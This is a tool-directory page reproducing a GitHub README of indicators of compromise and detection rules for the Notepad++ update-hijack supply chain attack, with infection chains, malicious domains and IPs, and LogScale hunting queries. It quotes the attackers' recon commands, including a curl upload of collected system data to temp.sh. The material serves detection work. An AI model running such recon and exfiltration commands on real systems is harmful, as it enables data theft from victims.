Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacy© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Tools/GitHubGitHub/renat0z3r0/notepadpp-supply-chain-iocs
Indicator of Compromise (IOC) ManagementThreat Feeds & AggregatorsVulnerability AnalysisForensicsMalware AnalysisThreat IntelligenceSupply Chain SecurityLearning & EducationIncident Response

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
GitHubrenat0z3r0/notepadpp-supply-chain-iocs

notepadpp-supply-chain-iocs

IoCs and detection rules for the Notepad++ supply chain attack (CVE-2025-15556) — Lotus Blossom APT, June–December 2025. Includes Falcon LogScale queries, YARA/Sigma rules, and MITRE ATT&CK mapping.

View Repository
1207 months agoNot yet reviewed

Notepad++ Supply Chain Attack — IoC Repository

CVE-2025-15556 | Lotus Blossom / Raspberry Typhoon | June – December 2025

Last Updated IoC Count License: MIT MITRE ATT&CK


Overview

This repository contains a comprehensive, consolidated collection of Indicators of Compromise (IoCs) related to the Notepad++ supply chain attack disclosed on February 2, 2026.

Between June and December 2025, a Chinese state-sponsored threat actor compromised the hosting infrastructure of Notepad++, hijacking the built-in update mechanism (WinGUp) to selectively deliver trojanized installers to targeted users. The attack exploited the lack of cryptographic verification in the updater (pre-v8.8.9), enabling the distribution of custom backdoors, Cobalt Strike Beacons, and Metasploit payloads.

Key facts

CVECVE-2025-15556 — Download of code without integrity check
Threat ActorLotus Blossom (Bilbug, Raspberry Typhoon, Thrip) / Zirconium (Violet Typhoon)
Active PeriodJune 2025 – December 2, 2025
Attack VectorSupply chain compromise via WinGUp auto-updater
TargetsGovernment, telecom, financial services, IT providers (Philippines, Vietnam, El Salvador, Australia, East Asia)
MalwareChrysalis backdoor (custom), Cobalt Strike Beacon, Metasploit Meterpreter
Patched inNotepad++ v8.8.9+ (certificate verification) / v8.9.1+ (XMLDSig validation)

Infection Chains

Kaspersky GReAT identified three distinct infection chains, rotated approximately monthly to evade detection:

Chain #1 — July/August 2025

GUP.exe → update.exe (NSIS) → ProShow.exe (legitimate) → exploit via "load" file
  → Metasploit downloader → Cobalt Strike Beacon
  • Abuses an old vulnerability in ProShow software instead of DLL sideloading
  • Reconnaissance: whoami && tasklist → exfiltrated via temp.sh
  • Working directory: %appdata%\ProShow\

Chain #2 — September/October 2025

GUP.exe → update.exe (NSIS) → script.exe (Lua interpreter) → alien.ini (compiled Lua)
  → shellcode via EnumWindowStationsW → Metasploit downloader → Cobalt Strike Beacon
  • Uses a legitimate Lua interpreter to execute compiled shellcode
  • Expanded recon: whoami && tasklist && systeminfo && netstat -ano
  • Working directory: %appdata%\Adobe\Scripts\

Chain #3 — October 2025

GUP.exe → update.exe (NSIS) → BluetoothService.exe (legitimate) → log.dll (sideloaded)
  → decrypts "BluetoothService" shellcode → Chrysalis backdoor
  • Classic DLL sideloading technique
  • No built-in reconnaissance (unlike chains 1 and 2)
  • Working directory: %appdata%\Bluetooth\
  • Associated Cobalt Strike Beacon found in C:\ProgramData\USOShared\
                     ┌─────────────────────────────────────────────────────────┐
                     │              COMPROMISE TIMELINE                        │
                     ├─────────┬─────────┬─────────┬─────────┬─────────┬──────┤
                     │  Jul 25 │  Aug 25 │  Sep 25 │  Oct 25 │  Nov 25 │Dec 25│
                     ├─────────┴─────────┴─────────┴─────────┴─────────┴──────┤
  Chain #1 (ProShow) │████████████████████                                    │
  Chain #2 (Lua)     │                    █████████████████████████████        │
  Chain #3 (DLL SL)  │                              ██████████████            │
  Infra access       │████████████████████████████████████████████████████████│
                     └────────────────────────────────────────────────────────┘

Repository Contents

FileDescription
notepadpp_supply_chain_iocs.csvFull IoC dataset (105 indicators) with MITRE ATT&CK mapping

CSV Schema

ColumnDescription
ioc_typeType: ip, domain, url, sha1, sha256, filepath, filename, useragent, behavior, cve, attribution, compromise_window
ioc_valueThe indicator value
chainInfection chain (1, 2, 3, 1/2, 2/3, all, n/a)
contextDescription of what the IoC represents
sourceIntelligence source (Kaspersky, Rapid7, CrowdStrike, Tenable, Kevin Beaumont)
riskSeverity (CRITICAL, HIGH, MEDIUM, LOW, INFO)
mitre_techniqueMITRE ATT&CK technique ID

Detection & Threat Hunting

Priority indicators (start here)

Behavioral — IoC-agnostic, highest value:

  • gup.exe spawning any child process other than a legitimate signed Notepad++ installer
  • gup.exe connecting to domains/IPs other than notepad-plus-plus.org, github.com, release-assets.githubusercontent.com
  • Creation of directories: %appdata%\ProShow\, %appdata%\Adobe\Scripts\, %appdata%\Bluetooth\
  • Creation of %localappdata%\Temp\ns.tmp\ (NSIS runtime — present in all chains)

Network — high confidence:

  • DNS resolution of cdncheck.it.com, safe-dns.it.com, self-dns.it.com, api.skycloudcenter.com, api.wiresguard.com
  • Connections to temp.sh (51.91.79.17) — especially with file upload via curl
  • HTTP requests with temp.sh URLs embedded in the User-Agent header
  • Outbound connections to 45.76.155.202, 45.32.144.255, 95.179.213.0, 45.77.31.210

Recon commands (post-exploitation):

cmd /c whoami&&tasklist > 1.txt
cmd /c "whoami&&tasklist&&systeminfo&&netstat -ano" > a.txt
curl -F "[email protected]" -s https://temp.sh/upload

CrowdStrike Falcon LogScale queries

Behavioral: GUP.exe child process hunting
#event_simpleName=ProcessRollup2 event_platform=Win ParentBaseFileName="gup.exe"
| FilePath=/\\Device\\HarddiskVolume\d+(?<shortFilePath>.+$)/
| groupBy([FileName, SHA256HashData, shortFilePath, CommandLine])
Multi-IoC hunt across process, network, and DNS events
#event_simpleName=/(ProcessRollup2|NetworkConnectIP4|DnsRequest)/ event_platform=Win
| case {
    // Malicious IPs
    RemoteAddressIP4=/(95\.179\.213\.0|61\.4\.102\.97|59\.110\.7\.32|124\.222\.137\.114|45\.76\.155\.202|45\.32\.144\.255|45\.77\.31\.210)/
        | iocType := "Malicious IP" | iocValue := RemoteAddressIP4 | riskScore := "HIGH";
    // Malicious Domains
    DomainName=/(api\.skycloudcenter\.com|api\.wiresguard\.com|cdncheck\.it\.com|safe-dns\.it\.com|self-dns\.it\.com|temp\.sh)/i
        | iocType := "Malicious Domain" | iocValue := DomainName | riskScore := "HIGH";
    // Suspicious filenames
    ImageFileName=/\\(BluetoothService|admin|system|loader1|loader2|s047t5g|ConsoleApplication2|3yzr31vk|uffhxpSy)\.exe$/i
        | iocType := "Suspicious Filename" | iocValue := ImageFileName | riskScore := "MEDIUM";
    // Suspicious DLLs
    ImageFileName=/\\(log\.dll|libtcc\.dll)$/i
        | iocType := "Suspicious DLL" | iocValue := ImageFileName | riskScore := "MEDIUM";
    // Chain-specific artifacts
    ImageFileName=/\\(alien\.ini|load)$/i
        | iocType := "Chain Artifact" | iocValue := ImageFileName | riskScore := "HIGH";
    * | iocType := null;
}
| iocType=*
| ImageFileName=/\\(?<FileName>[^\\]+)$/
| table([riskScore, iocType, iocValue, @timestamp, aid, ComputerName, FileName, ImageFileName, CommandLine, SHA256HashData, RemoteAddressIP4, DomainName], limit=5000)
NSIS installer detection (all chains)
Download Tool